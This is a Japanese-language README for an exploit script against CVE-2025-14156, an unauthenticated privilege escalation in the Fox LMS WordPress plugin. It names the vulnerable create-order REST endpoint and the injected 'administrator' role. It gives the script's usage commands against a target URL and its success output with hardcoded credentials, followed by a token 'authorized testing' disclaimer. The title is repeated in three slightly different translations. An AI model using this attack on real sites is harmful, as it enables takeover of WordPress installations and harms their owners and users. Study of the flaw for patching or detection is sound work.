
Fox LMS – WordPress LMS プラグイン 1.0.4.7 - 1.0.5.1 - 'createOrder' による未認証の権限昇格
Fox LMS – WordPress LMS プラグイン 1.0.4.7 - 1.0.5.1 - 'createOrder' 経由の未認証権限昇格
Fox LMS – WordPress LMS プラグイン (v1.0.4.7 から v1.0.5.1) – createOrder 経由の未認証権限昇格
WordPress 用 Fox LMS の 1.0.5.1 までの全バージョンは、権限昇格に対して脆弱です。/fox-lms/v1/payments/create-order REST API エンドポイントは、新規ユーザー作成時に 'role' パラメータを適切に検証しないため、未認証の攻撃者が Administrator を含む任意のロールでアカウントを作成できます。
CVE: CVE-2025-14156
CVSS スコア: 9.8 (緊急)
リスク: サイト全体の侵害。
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
悪用に成功すると、スクリプトは以下のみを出力します:
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
悪用に失敗した場合は、簡潔なエラーメッセージのみが表示されます。
'administrator' ロールを注入します。このツールは教育および許可されたテスト目的のみに使用されます。明示的な許可なくシステムに対して行う不正使用は違法です。作者は、このスクリプトの使用に起因する誤用、損害、法的結果について責任を負いません。常に責任ある開示慣行に従い、いかなるターゲットをテストする前に書面による承認を得てください。
Telegram: @Nxploited
Github: Nxploited